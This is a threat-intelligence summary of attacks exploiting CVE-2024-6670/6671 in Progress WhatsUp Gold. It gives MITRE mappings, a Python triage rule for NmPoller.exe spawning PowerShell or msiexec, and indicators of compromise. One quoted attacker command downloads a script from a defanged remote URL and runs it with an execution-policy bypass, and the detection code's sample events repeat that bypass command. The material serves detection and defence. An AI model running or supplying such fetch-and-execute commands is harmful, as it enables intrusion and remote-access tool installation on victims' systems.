Trend Micro MXDR analyzed remote code execution attacks on Progress WhatsUp Gold abusing CVE-2024-6670/6671, with NmPoller.exe invoking PowerShell scripts to download and run remote access tools. Even though patches were available, some organizations delayed applying them, leading to incidents shortly after a PoC was published; mitigation emphasizes immediate patching, access controls, and monitoring suspicious process activity.
Keypoints
- Remote code execution attacks on WhatsUp Gold identified since August 30.
- Exploited vulnerabilities CVE-2024-6670 and CVE-2024-6671, patched on August 16; PoC published August 30.
- Attacks leveraged the Active Monitor PowerShell Script function.
- Threat actors used NmPoller.exe to execute malicious PowerShell scripts.
- Attackers attempted to install multiple remote access tools.
- Mitigation includes applying patches, tightening access controls, and monitoring suspicious activities.
- Patch management is crucial, especially for high-severity vulnerabilities.
MITRE Techniques
- [T1059.001] PowerShell – Execution of PowerShell scripts via NmPoller.exe. Quote: “Multiple PowerShell scripts were executed via NmPoller.exe.”
- [T1218.005] Signed Binary Proxy Execution: Msiexec – Used msiexec to install remote access tools. Quote: “They attempted to install these four remote access tools (RATs) via msiexec.exe.”
- [T1060] Registry Run Keys / Startup Folder – Persistence through installed remote administration tools. Quote: “Installed remote administration tools for persistence.”
- [T1059.003] Windows Command Shell – Commands executed through PowerShell and msiexec. Quote: “Executed commands through PowerShell and msiexec.”
- [T1105] Ingress Tool Transfer – Downloading malicious payloads from remote URLs (e.g., DownloadFile and iwr usage). Quote: "(New-Object System.Net.WebClient).DownloadFile('hxxps://webhook[.]site/b6ef7410-9ec8-44f7-8cdf-7890c1cf5837','c:\programdata\a.ps1'); powershell -exec bypass -file c:\programdata\a.ps1"
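As an added example (not code from the Trend Micro report), the NmPoller.exe-to-PowerShell/msiexec process chain described above can be turned into a small triage rule over process-creation telemetry. The records below are constructed in the shape of Sysmon Event ID 1 fields and the WhatsUp Gold install path is assumed; because legitimate Active Monitor scripts also run under NmPoller.exe, the rule only escalates a child process when its command line additionally carries a download cradle, an execution-policy bypass, or an MSI install from a temp/URL source.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 field names);
# the NmPoller.exe path is an assumed default install location.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files (x86)\Ipswitch\WhatsUp\NmPoller.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -exec bypass -file c:\\programdata\\a.ps1"},
    {"ParentImage": r"C:\Program Files (x86)\Ipswitch\WhatsUp\NmPoller.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec /i c:\\windows\\temp\\MSsetup.msi /qn"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-Service"},
    {"ParentImage": r"C:\Program Files (x86)\Ipswitch\WhatsUp\NmPoller.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c Get-Counter '\\Processor(_Total)\\% Processor Time'"},
]

# Child images worth a look when spawned by the poller
CHILDREN = {"powershell.exe", "pwsh.exe", "msiexec.exe", "cmd.exe"}
# Download-cradle and execution-policy-bypass markers from the reported scripts
CRADLE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b"
    r"|-exec(?:utionpolicy)?\s+bypass|\bhttps?://", re.I)
# msiexec installing from a user-writable/temp path or straight from a URL
MSI_SRC = re.compile(
    r"(?:/i|/package)\s+\"?(?:https?://|c:\\(?:windows\\temp|programdata|users))", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return the findings for one event; an empty list means nothing of note."""
    findings = []
    if basename(ev["ParentImage"]) != "nmpoller.exe":
        return findings
    child = basename(ev["Image"])
    if child not in CHILDREN:
        return findings
    findings.append(f"NmPoller.exe spawned {child}")
    cl = ev["CommandLine"]
    if child in ("powershell.exe", "pwsh.exe") and CRADLE.search(cl):
        findings.append("download cradle / execution-policy bypass")
    if child == "msiexec.exe" and MSI_SRC.search(cl):
        findings.append("msiexec install from temp/URL")
    return findings

def triage(events):
    """Index -> findings, keeping only events with evidence beyond the parent/child pair."""
    return {i: f for i, ev in enumerate(events) if len(f := classify(ev)) > 1}
```

Event 3 (a benign-looking monitor script under NmPoller.exe) is deliberately kept out of the triage output, showing why the parent/child pair alone is too noisy on a WhatsUp Gold host.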
Indicators of Compromise
- [File path] Suspicious files used by NmPoller.exe – C:\ProgramData\a.ps1, c:\windows\temp\MSsetup.msi, C:\ProgramData\ftpd32.exe
- [SHA256] File hashes for suspicious files – 6daa94a36c8ccb9442f40c81a18b8501aa360559865f211d72a74788a1bbf3ce, f1c68574167eaea826a90595710e7ee1a1e75c95433883ce569a144f116e2bf4, 992974377793c2479065358b358bb3788078970dacc7c50b495061ccc4507b90
- [URL] Remote hosts serving malicious payloads – hxxps://webhook[.]site/b6ef7410-9ec8-44f7-8cdf-7890c1cf5837, hxxps://fedko[.]org/wp-includes/ID3/setup.msi
- [IP/Domain] External network indicators – hxxp://45.227.255[.]216:29742/ddQCz2CkW8/setup.msi, hxxp://185.123.100[.]160/access/Remote Access-windows64-offline.exe
Read more: https://www.trendmicro.com/en_us/research/24/i/whatsup-gold-rce.html